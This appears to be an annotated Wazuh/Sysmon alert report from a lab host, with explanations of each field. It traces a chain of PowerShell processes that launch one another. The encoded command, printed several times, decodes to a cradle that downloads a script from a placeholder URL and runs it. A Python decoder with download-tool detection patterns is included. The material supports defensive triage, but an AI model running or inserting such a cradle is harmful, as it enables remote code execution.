data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:57:01.866 ProcessGuid: {94294ddc-c1bd-680a-100d-000000000e00} ProcessId: 13568 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c1ba-680a-0e0d-000000000e00} ParentProcessId: 16768 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Sysmon's rendered text for Event ID 1 (Process Create); every eventdata field below is parsed from it. The headline is in CommandLine: powershell.exe launching another powershell.exe with -NoLogo -NoProfile -EncodedCommand, and the parent's command line is identical.

data.win.eventdata.utcTime:  2025-04-24 22:57:01.866
When Sysmon saw the process start (UTC). Earlier than the alert's timestamp, which is when Wazuh indexed it; use this one for the host timeline.

data.win.eventdata.processGuid:  {94294ddc-c1bd-680a-100d-000000000e00}
Sysmon's unique ID for this process, stable across PID reuse. Pivot on it: it reappears as parentProcessGuid in child EID 1 events and as processGuid in this process's EID 11 file creates.

data.win.eventdata.processId:  13568
Windows PID. Reused after the process exits, so only meaningful together with utcTime or processGuid.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable, here the stock Windows PowerShell 5.1 binary. Check the path is under System32 and not a look‑alike in a user‑writable folder.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version resource of the image; 10.0.26100.x is the Windows 11 24H2 / Server 2025 build line, consistent with a stock binary.

data.win.eventdata.description:  Windows PowerShell
Description string from the PE version resource. Trivially forged, so treat it as a hint and confirm with the hash.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product name from the version resource; same caveat.

data.win.eventdata.company:  Microsoft Corporation
Company name from the version resource; same caveat.

data.win.eventdata.originalFileName:  PowerShell.EXE
Internal name compiled into the PE. It stays PowerShell.EXE even if the file on disk is renamed, so detections keyed on it catch renamed copies.
data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
The exact command line. -NoLogo -NoProfile -EncodedCommand <base64> is the classic cradle shape: the argument is base64 of UTF‑16LE text, and here it decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), i.e. fetch a script from a URL and run it in memory. The image path appears twice, once as the program and once as the first argument; the payload is the encoded argument.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process. The profile root is unremarkable; Temp, Public or a network share would be a stronger signal.

data.win.eventdata.user:  Attacker\\Attcker1
Account the process runs as, DOMAIN\user. The domain part equals the hostname, so this is a local account, not a domain one.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
GUID of the logon session, the same one the Security 4624 event carries. It is identical across the whole chain, so everything happened in one session.

data.win.eventdata.logonId:  0x26584
Logon session LUID, as shown in 4624/4688. Search on it to pull everything else done in that session.

data.win.eventdata.terminalSessionId:  1
Windows session number. 0 is services and non-interactive logons; 1 or higher is an interactive desktop or RDP session, so a human (or a script started by one) is behind this.

data.win.eventdata.integrityLevel:  Medium
Medium = standard user token, not elevated. High would mean UAC-elevated admin and System a service; this tells you whether the attacker already has admin.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash(es) of the image file, algorithms as set in the Sysmon config. Identical across the chain confirms the same binary; verify it against a known-good PowerShell hash for this build.

data.win.eventdata.parentProcessGuid:  {94294ddc-c1ba-680a-0e0d-000000000e00}
Sysmon GUID of the parent. Walk the chain by matching it against processGuid in other EID 1 events; the parent here (PID 16768) is not in this report, so search for it.

data.win.eventdata.parentProcessId:  16768
PID of the parent, subject to reuse; prefer the GUID.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable of the parent. PowerShell spawning PowerShell with the same arguments is rare for humans and typical of scripts, loaders and stagers.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Parent's full command line. It is identical to the child's, so the same encoded payload spawned this copy; expect the chain to continue (it does: 13568 → 13988 → 16876 in the alerts that follow).

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account that owns the parent process. A change between parent and child would indicate a token or credential switch; none here.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.
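Decoding the -EncodedCommand argument is the first triage step for this alert. The Python below is an added example, not part of the SOCscribe report or of Wazuh: it pulls the base64 argument out of the command line shown above (rebuilt here as a constructed sample with the JSON escaping removed), decodes it as UTF‑16LE the way powershell.exe does, and flags download-cradle patterns. The switch-prefix regex, the indicator labels and the triage_command_line helper are this example's own choices, not fields of the alert.

```python
import base64
import re
from typing import Optional

# Constructed sample: the CommandLine from the Process Create alert above, with the
# JSON escaping removed. The base64 argument is copied verbatim from the alert.
SAMPLE_COMMAND_LINE = (
    r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
    "-NoLogo -NoProfile -EncodedCommand "
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
)

# powershell.exe accepts any prefix of -EncodedCommand (-e, -en, -enc, -encodedc, ...) plus
# the documented alias -ec, case-insensitively, and takes '/' as well as '-' as the switch
# character. Longest alternatives first so "-encodedcommand" is not cut short at "-e".
_ENC_FLAGS = sorted(
    {"encodedcommand"[:n] for n in range(1, len("encodedcommand") + 1)} | {"ec"},
    key=len, reverse=True,
)
_ENC_RE = re.compile(
    r"(?<![\w-])[-/](?:" + "|".join(_ENC_FLAGS) + r")\s+[\"']?([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)

# Indicator labels below are this example's own, not alert fields.
_INVOKE_RE = re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.IGNORECASE)
_DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadFile|DownloadData|Net\.WebClient|Invoke-WebRequest|"
    r"Invoke-RestMethod|\biwr\b|\birm\b|\bcurl\b|\bwget\b|Start-BitsTransfer",
    re.IGNORECASE,
)
_URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


def extract_encoded_command(command_line: str) -> Optional[str]:
    """Return the base64 argument given to -EncodedCommand, or None if there is none."""
    m = _ENC_RE.search(command_line)
    return m.group(1) if m else None


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand is base64 over UTF-16LE text; None if the argument is neither."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None


def triage_command_line(command_line: str) -> dict:
    """Decode an encoded PowerShell command line and pull out what an analyst reads first."""
    result = {"encoded": False, "decoded": None, "indicators": [], "urls": []}
    b64 = extract_encoded_command(command_line)
    if b64 is None:
        return result
    result["encoded"] = True
    decoded = decode_encoded_command(b64)
    result["decoded"] = decoded
    if decoded is None:
        result["indicators"].append("undecodable_argument")
        return result
    if _INVOKE_RE.search(decoded):
        result["indicators"].append("invoke_expression")
    if _DOWNLOAD_RE.search(decoded):
        result["indicators"].append("web_download")
    result["urls"] = _URL_RE.findall(decoded)
    # Fetch-then-evaluate in one line is the download-cradle shape behind T1059.001 + T1105.
    if {"invoke_expression", "web_download"} <= set(result["indicators"]):
        result["indicators"].append("download_cradle")
    return result


if __name__ == "__main__":
    for key, value in triage_command_line(SAMPLE_COMMAND_LINE).items():
        print(f"{key}: {value}")
```

Run against the alert's command line this returns the decoded cradle, the single URL it reaches for, and the indicators invoke_expression, web_download and download_cradle; the URL is what you block or hunt for next, and an undecodable argument is itself worth a look because it means the attacker is not using the plain UTF‑16LE encoding powershell.exe expects.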

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:57:05.703+0000 | 🧠 MITRE: Command and Control – Ingress Tool Transfer [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:57:05.703+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  143
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535425.2963955
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means the event ID and eventdata follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider; this is Sysmon's fixed provider GUID, handy for exact-match filters.

data.win.system.eventID:  11
Event ID within the provider. Because the provider is Sysmon, 11 is Sysmon's FileCreate event, not a Security-log ID like 4624/4688.

data.win.system.version:  2
Schema version of the event record; the field layout can change between versions, so decoders key on it.

data.win.system.level:  4
Numeric level: 4 = Informational, 3 = Warning, 2 = Error. Sysmon's operational events are all Informational, so this says nothing about severity.

data.win.system.task:  11
Task category; for Sysmon events it simply mirrors the event ID.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:57:03.4336005Z
When the Event Log service stamped the record (UTC, 100 ns resolution). Sits between eventdata.utcTime and the Wazuh timestamp; the gap to the latter is your collection lag.

data.win.system.eventRecordID:  351117
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that logged the event, i.e. the Sysmon service (3712 on every event here), not the process being reported on.

data.win.system.threadID:  4740
Thread inside Sysmon that wrote the record. Forensic noise.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record was read from; pair it with eventID to know which Sysmon event type you are looking at.

data.win.system.computer:  Attacker
Hostname the event was written on. Should match agent.name; a mismatch means forwarded events or a renamed host.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:57:03.394 ProcessGuid: {94294ddc-c1bd-680a-100d-000000000e00} ProcessId: 13568 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_byyqns3s.1z0.ps1 CreationUtcTime: 2025-04-24 22:57:03.394 User: Attacker\Attcker1"
Sysmon's rendered text for Event ID 11 (FileCreate). ProcessGuid here equals the processGuid of the Process Create alert before it (PID 13568), which ties this file to the encoded PowerShell command.

data.win.eventdata.utcTime:  2025-04-24 22:57:03.394
When Sysmon recorded the file create (UTC); about 1.5 s after the creating process started.

data.win.eventdata.processGuid:  {94294ddc-c1bd-680a-100d-000000000e00}
Sysmon GUID of the creating process. It matches the processGuid of the Process Create alert above (PID 13568), which is the join key between EID 1 and EID 11.

data.win.eventdata.processId:  13568
PID of the creating process; subject to reuse, prefer the GUID.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable that created the file.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_byyqns3s.1z0.ps1
Full path of the created file. __PSScriptPolicyTest_<random>.ps1 in %TEMP% is written by PowerShell itself at startup to test whether an AppLocker/WDAC script policy applies to it; on its own it is benign, and this rule fires on it every time PowerShell starts (compare rule.firedtimes). The real signal is the parent chain that launched this PowerShell, not the file.

data.win.eventdata.creationUtcTime:  2025-04-24 22:57:03.394
The file's creation timestamp. Equal to utcTime here; if it were earlier, the file already existed and was overwritten (or timestomped).

data.win.eventdata.user:  Attacker\\Attcker1
Account that created the file.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:57:08.104+0000 | 🧠 MITRE: Execution – PowerShell [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059.001 – Command and Scripting Interpreter: PowerShell

🔍 Full Alert Details
timestamp:  2025-04-24T22:57:08.104+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  140
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535428.2966724
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means the event ID and eventdata follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider; this is Sysmon's fixed provider GUID, handy for exact-match filters.

data.win.system.eventID:  1
Event ID within the provider. Because the provider is Sysmon, 1 is Sysmon's ProcessCreate event, not a Security-log ID like 4624/4688 (the Security-log equivalent would be 4688).

data.win.system.version:  5
Schema version of the event record; the field layout can change between versions, so decoders key on it.

data.win.system.level:  4
Numeric level: 4 = Informational, 3 = Warning, 2 = Error. Sysmon's operational events are all Informational, so this says nothing about severity.

data.win.system.task:  1
Task category; for Sysmon events it simply mirrors the event ID.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:57:06.0234990Z
When the Event Log service stamped the record (UTC, 100 ns resolution). Sits between eventdata.utcTime and the Wazuh timestamp; the gap to the latter is your collection lag.

data.win.system.eventRecordID:  351150
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that logged the event, i.e. the Sysmon service (3712 on every event here), not the process being reported on.

data.win.system.threadID:  4740
Thread inside Sysmon that wrote the record. Forensic noise.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record was read from; pair it with eventID to know which Sysmon event type you are looking at.

data.win.system.computer:  Attacker
Hostname the event was written on. Should match agent.name; a mismatch means forwarded events or a renamed host.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:57:04.713 ProcessGuid: {94294ddc-c1c0-680a-120d-000000000e00} ProcessId: 13988 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c1bd-680a-100d-000000000e00} ParentProcessId: 13568 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Sysmon's rendered text for Event ID 1 (Process Create). ParentProcessGuid/ParentProcessId point at PID 13568, the process from the 22:57:01 alert, and the command lines are identical again: the encoded PowerShell is re-spawning itself roughly every 3 s.

data.win.eventdata.utcTime:  2025-04-24 22:57:04.713
When Sysmon saw the process start (UTC); about 2.8 s after its parent (PID 13568) started.

data.win.eventdata.processGuid:  {94294ddc-c1c0-680a-120d-000000000e00}
Sysmon's unique ID for this process, stable across PID reuse. It reappears as parentProcessGuid in the next Process Create alert and as processGuid in this process's EID 11 file create.

data.win.eventdata.processId:  13988
Windows PID. Reused after the process exits, so only meaningful together with utcTime or processGuid.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable, the same stock Windows PowerShell 5.1 binary as the parent.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version resource of the image; 10.0.26100.x is the Windows 11 24H2 / Server 2025 build line, consistent with a stock binary.

data.win.eventdata.description:  Windows PowerShell
Description string from the PE version resource. Trivially forged, so treat it as a hint and confirm with the hash.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product name from the version resource; same caveat.

data.win.eventdata.company:  Microsoft Corporation
Company name from the version resource; same caveat.

data.win.eventdata.originalFileName:  PowerShell.EXE
Internal name compiled into the PE. It stays PowerShell.EXE even if the file on disk is renamed, so detections keyed on it catch renamed copies.
data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
The exact command line, byte-for-byte the same as in the 22:57:01 alert. The -EncodedCommand argument is base64 of UTF‑16LE text and decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'): download a script and run it in memory.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process, inherited from the parent. The profile root is unremarkable; Temp, Public or a network share would be a stronger signal.

data.win.eventdata.user:  Attacker\\Attcker1
Account the process runs as, DOMAIN\user. The domain part equals the hostname, so this is a local account, not a domain one.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
GUID of the logon session, the same one the Security 4624 event carries. Unchanged from the parent, so the whole chain runs in one session.

data.win.eventdata.logonId:  0x26584
Logon session LUID, as shown in 4624/4688. Search on it to pull everything else done in that session.

data.win.eventdata.terminalSessionId:  1
Windows session number. 0 is services and non-interactive logons; 1 or higher is an interactive desktop or RDP session.

data.win.eventdata.integrityLevel:  Medium
Medium = standard user token, not elevated. High would mean UAC-elevated admin and System a service; still no privilege escalation at this point in the chain.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash(es) of the image file, algorithms as set in the Sysmon config. Same value as the parent, so it is the same binary; verify it against a known-good PowerShell hash for this build.

data.win.eventdata.parentProcessGuid:  {94294ddc-c1bd-680a-100d-000000000e00}
Sysmon GUID of the parent. It equals the processGuid of the 22:57:01 Process Create alert (PID 13568), so the chain so far is 16768 → 13568 → 13988.

data.win.eventdata.parentProcessId:  13568
PID of the parent, subject to reuse; prefer the GUID.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable of the parent. PowerShell spawning PowerShell with the same arguments is rare for humans and typical of scripts, loaders and stagers.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Parent's full command line. Identical to the child's, so the same encoded payload spawned this copy; a self-relaunching script or stager, not a human typing.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account that owns the parent process. A change between parent and child would indicate a token or credential switch; none here.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:57:08.109+0000 | 🧠 MITRE: Command and Control – Ingress Tool Transfer [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:57:08.109+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  144
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535428.2974795
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means the event ID and eventdata follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider; this is Sysmon's fixed provider GUID, handy for exact-match filters.

data.win.system.eventID:  11
Event ID within the provider. Because the provider is Sysmon, 11 is Sysmon's FileCreate event, not a Security-log ID like 4624/4688.

data.win.system.version:  2
Schema version of the event record; the field layout can change between versions, so decoders key on it.

data.win.system.level:  4
